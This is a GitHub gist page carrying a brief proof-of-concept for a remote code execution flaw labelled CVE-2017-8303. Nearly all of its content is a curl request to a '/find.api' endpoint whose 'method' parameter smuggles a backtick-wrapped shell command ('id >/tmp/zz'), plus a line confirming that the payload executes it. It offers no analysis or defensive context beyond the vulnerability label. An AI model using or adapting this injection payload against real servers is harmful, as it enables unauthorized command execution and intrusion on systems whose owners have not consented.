Skip to content

Instantly share code, notes, and snippets.

Hoom21

Block or report user

Report or block Hoom21

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View gist:06a8b6d357781d8f4989d39c24d7e341
RCE: CVE-2017-8303
> curl -i '/find.api' --data "method=x%27%60id>/tmp/zz%60%27&oauth_token=b"
> -H 'Content-type: application/x-www-form-urlencoded'
>
> This Payload executes "id >/tmp/zz".
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Remote Code Execution
You can’t perform that action at this time.